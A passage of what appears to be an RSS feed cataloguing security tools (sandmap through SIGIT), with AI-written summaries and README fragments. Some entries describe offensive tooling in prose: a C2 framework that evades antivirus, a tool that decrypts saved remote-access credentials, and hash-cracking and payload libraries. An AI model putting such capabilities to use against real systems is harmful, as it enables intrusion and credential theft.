 • &lt;a href="#configuration"&gt;Configuration&lt;/a&gt;
 • &lt;a href="#requirements"&gt;Requirements&lt;/a&gt;
 • &lt;a href="#other"&gt;Other&lt;/a&gt;
 • &lt;a href="#contributing"&gt;Contributing&lt;/a&gt;
 • &lt;a href="#license"&gt;License&lt;/a&gt;
 • &lt;a href="https://github.com/trimstray/sandmap/wiki"&gt;Wiki&lt;/a&gt;
&lt;/h5&gt;
&lt;br&gt;
&lt;p align="center"&gt;
 &lt;img src="https://i.imgur.com/9a97M2S.gif" alt="Master"&gt;
&lt;/p&gt;</description></item><item><title>SatIntel</title><link>https://rainmana.github.io/hackyfeed/tools/ang13t-satintel/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ang13t-satintel/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SatIntel is an OSINT tool designed for satellite reconnaissance, built with Golang. It enables users to extract satellite telemetry, receive orbital predictions, and parse Two Line Elements (TLE) using a command-line interface that integrates with APIs from Space Track and N2YO. Notable features include satellite catalog retrieval, telemetry display, visual and radio orbital predictions, and user-friendly authentication through environmental variables.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="satintel"&gt;SatIntel&lt;/h1&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt; . . . . . . . . .
 . . . ________
 . ///////// . . . . . .
 . ________ . . ///////// . .
 |.____. /\ ///////// . . . .
 . // \/ |\ /////////
 // \ | \ ///////// _______ _______ _______ _____ __ _ _______ _______ .
 || | | ///////// . . |______ |_____| | | | \ | | |______ |
 . || | |// ///// ______| | | | __|__ | \_| | |______ |_____ .
 \\ / // \/ .
 \\.___./ //\ ,_\ . . .
 . . \ //////\ / \ . . Satellite OSINT CLI Tool . .
 . ///////// \| | .
 . ///////// . \ __ / . Made by Angelina Tsuboi (G4LXY) .
 . ///////// . . .
 . . ///////// . . . . . .
 -------- . .. . . .
 . . . . . .
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="satintel-is-a-osint-tool-for-satellite-reconnaissance-made-with-golang-the-tool-can-extract-satellite-telemetry-receive-orbital-predictions-and-parse-tles"&gt;SatIntel is a OSINT tool for satellite reconnaissance made with Golang. The tool can extract satellite telemetry, receive orbital predictions, and parse TLEs.&lt;/h4&gt;
&lt;h3 id="features"&gt;Features&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Satellite Catalog Retrieval from NORAD ID or Selection Menu&lt;/li&gt;
&lt;li&gt;Display Satellite Telemetry&lt;/li&gt;
&lt;li&gt;Visual and Radio Orbital Predictions&lt;/li&gt;
&lt;li&gt;Parse Two Line Elements (TLE)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="preview"&gt;Preview&lt;/h3&gt;
&lt;img src="https://github.com/ANG13T/SatIntel/blob/main/assets/image.png" alt="SatIntel Image" width="600"/&gt;
&lt;h3 id="usage"&gt;Usage&lt;/h3&gt;
&lt;p&gt;Make an account at &lt;a href="https://space-track.org"&gt;&lt;strong&gt;Space Track&lt;/strong&gt;&lt;/a&gt; save username and password.&lt;/p&gt;</description></item><item><title>scan4all</title><link>https://rainmana.github.io/hackyfeed/tools/ghosttroops-scan4all/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ghosttroops-scan4all/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; scan4all is a versatile cybersecurity tool designed for automated web scanning and vulnerability detection, integrating various tools such as vscan, nuclei, and subfinder. It supports a wide range of protocols for password blasting and includes built-in detection capabilities for over 15,000 proof-of-concept (PoC) exploits. Built on Golang, it is cross-platform, lightweight, customizable, and features intelligent scanning mechanisms that optimize performance while ensuring comprehensive coverage of vulnerabilities.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://twitter.com/intent/follow?screen_name=Hktalent3135773"&gt;&lt;img src="https://img.shields.io/twitter/url/http/Hktalent3135773.svg?style=social" alt="Twitter"&gt;&lt;/a&gt; &lt;a href="https://twitter.com/intent/follow?screen_name=Hktalent3135773"&gt;&lt;img src="https://img.shields.io/twitter/follow/Hktalent3135773.svg?style=social&amp;amp;label=Follow" alt="Follow on Twitter"&gt;&lt;/a&gt; &lt;a href="https://github.com/hktalent/"&gt;&lt;img src="https://img.shields.io/github/followers/hktalent.svg?style=social&amp;amp;label=Follow" alt="GitHub Followers"&gt;&lt;/a&gt; &lt;a target=_blank href="https://chat.51pwn.com:2083/?cnId=51pwn&amp;atRd=true&amp;stChat=1"&gt;💬&lt;/a&gt;&lt;/p&gt;</description></item><item><title>Scanners-Box</title><link>https://rainmana.github.io/hackyfeed/tools/we5ter-scanners-box/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/we5ter-scanners-box/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Scanners Box is a comprehensive hacker toolkit that consolidates over 335 open-source scanners across various categories, such as subdomain enumeration, SQL injection vulnerability detection, and malware detection. The tool is designed for modular vulnerability assessment and does not include well-known scanning tools like Nmap or Metasploit, focusing instead on specialized scanning capabilities. Notable features include AI-powered autonomous scanners, dynamic and static code analysis, and comprehensive scanning for web applications and IoT devices.&lt;/p&gt;</description></item><item><title>scapy</title><link>https://rainmana.github.io/hackyfeed/tools/secdev-scapy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/secdev-scapy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Scapy is a versatile Python-based tool for interactive packet manipulation that allows users to forge, decode, and analyze packets across various network protocols. Its primary use cases include network scanning, tracerouting, and custom packet crafting, enabling complex tasks such as VLAN hopping and ARP cache poisoning. Notable features include extensive protocol support, intuitive shell interaction, and the ability to easily integrate into automated tests and attacks, making it a comprehensive option for cybersecurity professionals.&lt;/p&gt;</description></item><item><title>Scavenger</title><link>https://rainmana.github.io/hackyfeed/tools/rndinfosecguy-scavenger/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/rndinfosecguy-scavenger/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Scavenger is an OSINT bot designed to search for sensitive data leaks on paste sites, specifically targeting credentials, private keys, configuration files, and other sensitive information. It features customizable search terms, two operational modes (scraping archives and tracking users), and the ability to scan local folders for sensitive data. The bot effectively organizes crawled pastes into different directories based on detection outcomes, facilitating efficient data management.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="scavenger---osint-bot---reworked"&gt;Scavenger - OSINT Bot - REWORKED&lt;/h1&gt;
&lt;hr&gt;
&lt;p&gt;&lt;a href="https://twitter.com/leak_scavenger"&gt;bot in action&lt;/a&gt;&lt;/p&gt;</description></item><item><title>SchemaCrawler</title><link>https://rainmana.github.io/hackyfeed/tools/schemacrawler-schemacrawler/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/schemacrawler-schemacrawler/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Free database schema discovery and comprehension tool&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Free database schema discovery and comprehension tool&lt;/p&gt;</description></item><item><title>schemaspy</title><link>https://rainmana.github.io/hackyfeed/tools/schemaspy-schemaspy/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/schemaspy-schemaspy/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SchemaSpy is a database metadata analysis tool designed for visualizing and understanding data models through HTML-based reports and entity-relationship diagrams. It supports over a dozen database types via JDBC drivers and can be executed as a standalone application or through Maven, making it versatile for database administrators and developers. Notable features include easy navigation of data schemas and the ability to generate comprehensive documentation of database structures.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p&gt;&lt;a href="https://schemaspy.org/"&gt;&lt;img src="https://github.com/schemaspy/schemaspy/blob/master/docs/source/_static/schemaspy_logo.png" alt="Logotype"&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><title>scilla</title><link>https://rainmana.github.io/hackyfeed/tools/edoardottt-scilla/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/edoardottt-scilla/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Scilla is an information gathering tool designed for DNS, subdomains, ports, and directories enumeration. Its primary use case is for penetration testing, providing capabilities for extensive reconnaissance on target domains. Notable features include customizable wordlists for subdomain and directory enumeration, multiple output formats, and ease of installation through various methods such as Homebrew, Snap, and Docker.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
 &lt;img src="https://github.com/edoardottt/images/blob/main/scilla/logo.png"&gt;&lt;br&gt;
 &lt;b&gt;🏴‍☠️ Information Gathering tool 🏴‍☠️ - DNS / Subdomains / Ports / Directories enumeration&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;!-- go-report-card --&gt;
 &lt;a href="https://goreportcard.com/report/github.com/edoardottt/scilla"&gt;
 &lt;img src="https://goreportcard.com/badge/github.com/edoardottt/scilla" alt="go-report-card" /&gt;
 &lt;/a&gt;
 &lt;!-- workflows --&gt;
 &lt;a href="https://github.com/edoardottt/scilla/actions"&gt;
 &lt;img src="https://github.com/edoardottt/scilla/actions/workflows/go.yml/badge.svg" alt="workflows" /&gt;
 &lt;/a&gt;
 &lt;br&gt;
 &lt;sub&gt;
 Coded with 💙 by edoardottt
 &lt;/sub&gt;
 &lt;br&gt;
 &lt;!--Tweet button--&gt;
 &lt;a href="https://twitter.com/intent/tweet?url=https%3A%2F%2Fgithub.com%2Fedoardottt%2Fscilla%20&amp;text=Information%20Gathering%20tool%21&amp;hashtags=pentesting%2Clinux%2Cgolang%2Cnetwork" target="_blank"&gt;Share on Twitter!
 &lt;/a&gt;
&lt;/p&gt;</description></item><item><title>ScopeSentry</title><link>https://rainmana.github.io/hackyfeed/tools/autumn-27-scopesentry/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/autumn-27-scopesentry/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Scope Sentry is a versatile cybersecurity tool that provides functionalities such as asset mapping, subdomain enumeration, vulnerability scanning, and information leakage detection. Its primary use case is to facilitate comprehensive security assessments of web assets through a distributed scanning approach, allowing users to configure multiple scanning nodes. Notably, it features a plugin system for extensibility, supports multi-node scanning, and includes components for web monitoring and sensitive data leakage detection.&lt;/p&gt;</description></item><item><title>Search-That-Hash</title><link>https://rainmana.github.io/hackyfeed/tools/jayy001-search-that-hash/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jayy001-search-that-hash/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Search-That-Hash is a hash cracking automation tool that quickly queries popular online hash databases and utilizes Hashcat for local cracking when offline. It features automatic type identification through integration with Name-That-Hash, a fast search capability, extensibility for adding new hash sources, and an accessible design. Additionally, the tool offers both CLI and JSON API outputs, ensuring flexibility in usage for security professionals.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;p align="center"&gt;
&lt;img src="Pictures/logo.gif"&gt;
&lt;p align="center"&gt;➡️ &lt;a href="http://discord.skerritt.blog"&gt;Discord&lt;/a&gt; ⬅️&lt;/p&gt;
&lt;p align="center"&gt;&lt;img src="https://codecov.io/gh/HashPals/Search-That-Hash/branch/main/graph/badge.svg?token=5CYVJ15U4T"/&gt; &lt;img src="https://pepy.tech/badge/search-that-hash/month"&gt; &lt;img alt="Discord" src="https://img.shields.io/discord/754001738184392704"&gt;&lt;/p&gt;
&lt;p align="center"&gt;The Fastest Hash Cracking System&lt;br&gt;
&lt;code&gt;pip3 install search-that-hash &amp;&amp; sth&lt;/code&gt;
&lt;/p&gt;</description></item><item><title>SecretScanner</title><link>https://rainmana.github.io/hackyfeed/tools/deepfence-secretscanner/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/deepfence-secretscanner/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Deepfence SecretScanner is a standalone tool designed to identify unprotected secrets, such as API keys and passwords, within container images and file systems. It matches content against a comprehensive database of approximately 140 secret types, outputting detailed findings in JSON format. Furthermore, SecretScanner can be integrated into the ThreatMapper platform, allowing for holistic vulnerability scanning and risk assessment in cloud-native applications.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="secretscanner"&gt;SecretScanner&lt;/h1&gt;
&lt;p&gt;&lt;a href="https://threatmapper.org/docs/secretscanner/"&gt;&lt;img src="https://img.shields.io/badge/documentation-read-green" alt="Documentation"&gt;&lt;/a&gt;
&lt;a href="https://github.com/deepfence/SecretScanner/blob/master/LICENSE"&gt;&lt;img src="https://img.shields.io/github/license/deepfence/SecretScanner" alt="GitHub license"&gt;&lt;/a&gt;
&lt;a href="https://github.com/deepfence/SecretScanner/stargazers"&gt;&lt;img src="https://img.shields.io/github/stars/deepfence/SecretScanner" alt="GitHub stars"&gt;&lt;/a&gt;
&lt;a href="https://github.com/deepfence/SecretScanner/issues"&gt;&lt;img src="https://img.shields.io/github/issues/deepfence/SecretScanner" alt="GitHub issues"&gt;&lt;/a&gt;
&lt;a href="https://join.slack.com/t/deepfence-community/shared_invite/zt-podmzle9-5X~qYx8wMaLt9bGWwkSdgQ"&gt;&lt;img src="https://img.shields.io/badge/slack-@deepfence-blue.svg?logo=slack" alt="Slack"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;h1 id="secretscanner-1"&gt;SecretScanner&lt;/h1&gt;
&lt;p&gt;Deepfence SecretScanner can find unprotected secrets in container images or file systems.&lt;/p&gt;</description></item><item><title>sectemplates</title><link>https://rainmana.github.io/hackyfeed/tools/securitytemplates-sectemplates/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/securitytemplates-sectemplates/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SecTemplates is a resource repository designed for infosec professionals and engineering teams lacking dedicated security personnel, providing templates for various security programs such as bug bounties, incident response, and vulnerability management. The tool offers structured starting points including checklists, runbooks, and document templates, facilitating the establishment and scaling of security initiatives while maintaining neutrality towards specific vendors. Content is freely available for personal and commercial use, barring resale in other products.&lt;/p&gt;</description></item><item><title>security</title><link>https://rainmana.github.io/hackyfeed/tools/numirias-security/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/numirias-security/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The &amp;ldquo;security&amp;rdquo; repository serves as a compilation of security research and writing contributions by the author, highlighting vulnerabilities across various software platforms including Vim, Chrome, and Firefox. Its primary use case is to document security issues and provide insights via detailed write-ups and analysis, particularly related to Capture The Flag (CTF) challenges. Notable features include links to CVEs, write-ups of specific vulnerabilities, and a collection of past security issues relevant to major web browsers.&lt;/p&gt;</description></item><item><title>security-study-plan</title><link>https://rainmana.github.io/hackyfeed/tools/jassics-security-study-plan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/jassics-security-study-plan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Jassics Security Study Plan repository provides a comprehensive roadmap for aspiring cybersecurity engineers, covering various roles such as penetration testing, application security, cloud security, and DevSecOps. It offers structured study plans that include both free and paid resources, tools, and key concepts necessary to excel in the field. Notable features include detailed plans for specialized areas like AWS, GCP, and threat modeling, along with common skills assessments to help learners gauge their progress.&lt;/p&gt;</description></item><item><title>security-tools</title><link>https://rainmana.github.io/hackyfeed/tools/bl4de-security-tools/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bl4de-security-tools/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; security-tools is a collection of small security utilities developed in Python and Bash, aimed at assisting CTF competitors, bug bounty hunters, penetration testers, and developers. The primary use case is to facilitate various security tasks and streamline the testing process. Notable features include a diverse range of tools tailored for different security challenges and scenarios.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="security-tools"&gt;security-tools&lt;/h1&gt;
&lt;p&gt;Small security related tools created in Python and Bash for CTF players, bug bounty hunters, pentesters and developers.&lt;/p&gt;</description></item><item><title>securityonion</title><link>https://rainmana.github.io/hackyfeed/tools/security-onion-solutions-securityonion/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/security-onion-solutions-securityonion/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Security Onion 2.4 is an open-source Linux distribution for intrusion detection, network monitoring, and log management. Its primary use case is to provide security operations teams with tools to detect and respond to threats through features such as alert management, detailed dashboards, and packet capture (PCAP) capabilities. Notable functionalities include a hunting interface, customizable detection rules, and comprehensive configuration options, facilitating a proactive approach to cybersecurity.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h2 id="security-onion-24"&gt;Security Onion 2.4&lt;/h2&gt;
&lt;p&gt;Security Onion 2.4 is here!&lt;/p&gt;</description></item><item><title>see</title><link>https://rainmana.github.io/hackyfeed/tools/withsecureopensource-see/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/withsecureopensource-see/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Sandboxed Execution Environment (SEE) is a framework designed for automating tests in secure environments utilizing customizable sandboxes through libvirt. It supports various hypervisors, including QEMU and VirtualBox, and enables modular test platforms by allowing plugin integration for enhanced event-based interaction. Ideal for isolating and managing the execution of potentially dangerous or unstable software, SEE facilitates both quick prototyping and production-level testing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="sandboxed-execution-environment"&gt;Sandboxed Execution Environment&lt;/h1&gt;
&lt;p&gt;:Source: &lt;a href="https://github.com/F-Secure/see"&gt;https://github.com/F-Secure/see&lt;/a&gt;
:Documentation: &lt;a href="https://see.readthedocs.io"&gt;https://see.readthedocs.io&lt;/a&gt;
:Download: &lt;a href="https://pypi.python.org/pypi/python-see"&gt;https://pypi.python.org/pypi/python-see&lt;/a&gt;&lt;/p&gt;</description></item><item><title>seekr</title><link>https://rainmana.github.io/hackyfeed/tools/seekr-osint-seekr/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/seekr-osint-seekr/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Seekr is a multi-purpose toolkit designed for gathering and managing Open Source Intelligence (OSINT) data, featuring a streamlined web interface for data collection, organization, and analysis. Key functionalities include integration with popular OSINT tools, account discovery, customizable themes, and the absence of API keys for any features, making it suitable for researchers and investigators seeking to enhance their OSINT workflows. It is currently in beta development and allows for easy setup on various platforms including Windows, Linux, and Docker.&lt;/p&gt;</description></item><item><title>Selenium-Driverless</title><link>https://rainmana.github.io/hackyfeed/tools/ttlns-selenium-driverless/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/ttlns-selenium-driverless/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Selenium-Driverless is a Python package that enables web automation using Selenium without the need for a chromedriver, allowing for interactions with sites that commonly employ anti-bot mechanisms like Cloudflare. Its notable features include support for multiple tabs and incognito contexts, proxy authentication, and network interception, making it suitable for use cases that require more advanced browser automation scenarios while maintaining anonymity. The tool is designed primarily for non-commercial use and provides integration with asyncio for asynchronous operations.&lt;/p&gt;</description></item><item><title>server</title><link>https://rainmana.github.io/hackyfeed/tools/hashtopolis-server/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hashtopolis-server/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Hashtopolis is a client-server tool designed for distributing hashcat tasks across multiple computers, facilitating efficient password cracking on a scalable architecture. Notable features include multi-user support, a web-based administration interface, customizable agents, and strong security measures including agent trust levels and &amp;ldquo;secret&amp;rdquo; file handling. It utilizes an HTTP(S) communication protocol with a JSON-based configuration, enhancing usability and compatibility with common web hosting setups.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
&lt;h2 id="readme"&gt;README&lt;/h2&gt;
&lt;h1 id="hashtopolis"&gt;Hashtopolis&lt;/h1&gt;
&lt;img src="https://github.com/hashtopolis/server/blob/master/src/static/logo.png" alt='Hashtopolis' width="100"&gt;
&lt;p&gt;&lt;a href="https://www.codefactor.io/repository/github/hashtopolis/server"&gt;&lt;img src="https://www.codefactor.io/repository/github/hashtopolis/server/badge" alt="CodeFactor"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hashtopolis/server"&gt;&lt;img src="https://tokei.rs/b1/github/hashtopolis/server?category=code" alt="LoC"&gt;&lt;/a&gt;
&lt;a href="https://github.com/hashtopolis/server"&gt;&lt;img src="https://github.com/hashtopolis/server/actions/workflows/ci.yml/badge.svg" alt="Hashtopolis Build"&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Hashtopolis is a multi-platform client-server tool for distributing hashcat tasks to multiple computers. The main goals for Hashtopolis&amp;rsquo;s development are portability, robustness, multi-user support, and multiple groups management.
The application has two parts:&lt;/p&gt;</description></item><item><title>SessionGopher</title><link>https://rainmana.github.io/hackyfeed/tools/arvanaghi-sessiongopher/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/arvanaghi-sessiongopher/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SessionGopher is a PowerShell-based tool designed to retrieve and decrypt saved session information from remote access applications like PuTTY, WinSCP, FileZilla, and RDP. Its primary use case is for security assessments to identify systems that may connect to sensitive environments such as Unix systems or remote desktops. Notable features include thorough filesystem searches for private key files and the ability to run queries across multiple hosts or domain-joined systems, with results conveniently outputted to CSV files.&lt;/p&gt;</description></item><item><title>shad0w</title><link>https://rainmana.github.io/hackyfeed/tools/bats3c-shad0w/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bats3c-shad0w/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SHAD0W is a modular command and control (C2) framework designed for advanced threat operations within mature environments, leveraging techniques to evade endpoint detection and antivirus systems. Built with Python and C, it enables the execution of payloads including .NET assemblies and scripts entirely in memory, while offering features such as HTTPS communication, dynamic process injection, and extensive modularity for tasking beacons. Notable components include built-in privilege escalation exploits, a live web proxy feature, and a robust command-line interface, facilitating customization and effective covert operations.&lt;/p&gt;</description></item><item><title>shannon</title><link>https://rainmana.github.io/hackyfeed/tools/keygraphhq-shannon/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/keygraphhq-shannon/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Shannon is an autonomous AI penetration testing tool designed for web applications and APIs, capable of performing white-box security assessments through source code analysis and real exploit execution. It identifies potential vulnerabilities such as injection attacks and authentication bypasses, generating reports that include only verified exploits with reproducible proof-of-concept evidence. Key features include fully automated operation, OWASP vulnerability coverage, and integrated security tooling, making it suitable for continuous security testing throughout the software development lifecycle.&lt;/p&gt;</description></item><item><title>sharkjack-payloads</title><link>https://rainmana.github.io/hackyfeed/tools/hak5-sharkjack-payloads/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/hak5-sharkjack-payloads/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; The Shark Jack Payload Library provides a collection of community-driven payloads and extensions specifically designed for the Hak5 Shark Jack device, utilizing DuckyScript™ and Bash. Its primary use case is to enrich the functionality of the Shark Jack with customizable scripts for cybersecurity tasks, while also encouraging developer contributions for new payloads. Notable features include a platform for community collaboration and integration with Payload Studio for seamless payload creation.&lt;/p&gt;</description></item><item><title>shellen</title><link>https://rainmana.github.io/hackyfeed/tools/konatabrk-shellen/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/konatabrk-shellen/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Shellen is an interactive shellcoding environment designed for writing and utilizing shellcodes, supporting both assembly and disassembly operations. Leveraging the keystone and capstone engines, Shellen allows users to seamlessly switch between different modes, search syscall tables, and run shellcodes within a subprocess, while providing a user-friendly prompt that displays the current status and architecture. This tool caters primarily to developers and security researchers working with low-level code, making shellcode manipulation intuitive and efficient.&lt;/p&gt;</description></item><item><title>shhgit</title><link>https://rainmana.github.io/hackyfeed/tools/eth0izzle-shhgit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/eth0izzle-shhgit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; shhgit is a tool designed to enhance the security of development teams by identifying leaked secrets in code repositories, such as API tokens and private keys, before they can be exploited by malicious actors. It operates either by scanning public repositories via APIs of GitHub, GitLab, and BitBucket or processing local directories, and features a customizable search capability along with options for CSV reporting and entropy-based analysis. Notably, the tool is flexible for both cloud and local deployments, making it suitable for integration into CI/CD pipelines.&lt;/p&gt;</description></item><item><title>shortscan</title><link>https://rainmana.github.io/hackyfeed/tools/bitquark-shortscan/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/bitquark-shortscan/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; Shortscan is an IIS short filename enumeration tool that rapidly identifies files with short filenames on an IIS web server and attempts to discover their corresponding full filenames using a unique checksum matching method. Its notable features include support for custom headers, concurrency settings, and vulnerability checks without full file enumeration, as well as the ability to utilize custom wordlists and generate rainbow tables through an accompanying utility named &lt;code&gt;shortutil&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>sicat</title><link>https://rainmana.github.io/hackyfeed/tools/justakazh-sicat/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/justakazh-sicat/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SICAT is a comprehensive vulnerability and exploit finder that streamlines the reconnaissance process by aggregating data from multiple reputable databases based on user-defined keywords, Nmap scan results, or detected web technologies. Notable features include a modern web interface with real-time feedback, detailed HTML reporting with interactive elements, and intelligent keyword generation for enhanced search accuracy, all while supporting multithreaded scanning for optimized performance. This tool significantly aids security professionals in identifying vulnerabilities across various platforms and frameworks.&lt;/p&gt;</description></item><item><title>SIGIT</title><link>https://rainmana.github.io/hackyfeed/tools/termuxhackers-id-sigit/</link><pubDate>Mon, 30 Mar 2026 00:00:00 +0000</pubDate><guid>https://rainmana.github.io/hackyfeed/tools/termuxhackers-id-sigit/</guid><description>&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;AI Summary:&lt;/strong&gt; SIGIT is a modular OSINT CLI tool designed for efficient collection of public information, supporting reconnaissance, security testing, and digital forensics tasks. Its architecture leverages asynchronous programming and parallel scanning to enable fast data gathering across 14 diverse tools, including username checks, IP location services, and SSL certificate analysis. Notable features include a user-friendly command-line interface and a design that minimizes resource leaks through automated session management.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;hr&gt;
